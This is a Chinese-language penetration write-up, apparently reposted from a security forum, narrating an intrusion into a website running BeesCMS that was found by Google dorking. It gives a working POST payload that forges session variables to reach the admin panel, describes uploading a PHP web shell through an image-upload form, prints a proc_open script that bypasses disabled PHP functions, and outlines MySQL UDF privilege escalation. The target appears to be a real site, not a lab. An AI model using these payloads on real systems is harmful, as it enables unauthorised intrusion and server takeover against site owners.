摘要：這是一次挖掘cms通用漏洞時發(fā)現(xiàn)的網(wǎng)站，技術含量雖然不是很高，但是也拿出來和大家分享一下吧，希望能給一部分人帶來收獲。

---

0x01 進入后臺

在通過googlehack語法挖掘beescms時發(fā)現(xiàn)了這個站點
利用網(wǎng)上的payload，在/mx_form/mx_form.php?id=12頁面使用hackbarPOST以下數(shù)據(jù)

_SESSION[login_in]=1&_SESSION[admin]=1&_SESSION[login_time]=100000000000000000000000000000000000

然后訪問/admin便可以直接進入后臺

0x02 拿shell

進入后臺后在‘添加產(chǎn)品模塊’處尋找到了上傳點

嘗試上馬，但提示‘上傳圖片格式不正確’，于是上傳圖片馬抓包，在repeater里更改后綴為php，然后go

根據(jù)回顯沒有看出是否上傳成功，但也沒說失敗。經(jīng)過尋找在‘上傳圖片管理’處找到

點擊圖片發(fā)現(xiàn)解析了，直接菜刀連接，拿到shell

0x03 繞過安全模式

拿到shell后進入終端查看權限，但卻發(fā)現(xiàn)執(zhí)行命令失敗，可能遠程啟用了安全模式

經(jīng)過在網(wǎng)上一番查找得出：要找到未禁用的php執(zhí)行函數(shù)。先上傳了一個查看phpinfo的腳本，找到已禁用的函數(shù)

發(fā)現(xiàn)proc_open函數(shù)未被禁用，于是找到如下php腳本

<?php $descriptorspec=array( //這個索引數(shù)組用力指定要用proc_open創(chuàng)建的子進程的描述符0=>array('pipe','r'), //STDIN1=>array('pipe','w'),//STDOUT2=>array('pipe','w') //STDERROR);$handle=proc_open('whoami',$descriptorspec,$pipes,NULL);//$pipes中保存的是子進程創(chuàng)建的管道對應到 PHP 這一端的文件指針($descriptorspec指定的)if(!is_resource($handle)){die('proc_open failed');}//fwrite($pipes[0],'ipconfig');print('stdout:
');while($s=fgets($pipes[1])){print_r($s);}print('===========
stderr:
');while($s=fgets($pipes[2])){print_r($s);}fclose($pipes[0]);fclose($pipes[1]);fclose($pipes[2]);proc_close($handle);?>

上傳后可以執(zhí)行命令，成功繞過安全模式

0x04 提權

上圖可以看出只是iis權限，能做的事很局限，所以要想辦法提權。
菜刀中雖然不能執(zhí)行命令，但是可以查看文件，于是找到了數(shù)據(jù)庫配置文件

發(fā)現(xiàn)是mysql的數(shù)據(jù)庫，想到udf提權，于是上傳udf提權腳本(附件中)

登錄后導出udf便可以執(zhí)行命令了

提權成功，但是不可以添加用戶，也不能開3389。

---

結(jié)語：希望路過的各位大佬可以指點迷津，也歡迎各位來找我交流探討，感謝閱讀。

參考鏈接：

PHP限制命令執(zhí)行繞過https://www.cnblogs.com/R4v3n/articles/9081202.html?

作者：?PaperPen?

來源：先知社區(qū)

如有侵權，請聯(lián)系刪除

總結(jié)

以上是生活随笔為你收集整理的安全模式 提权_记一次渗透挖洞提权实战的全部內(nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯，歡迎將生活随笔推薦給好友。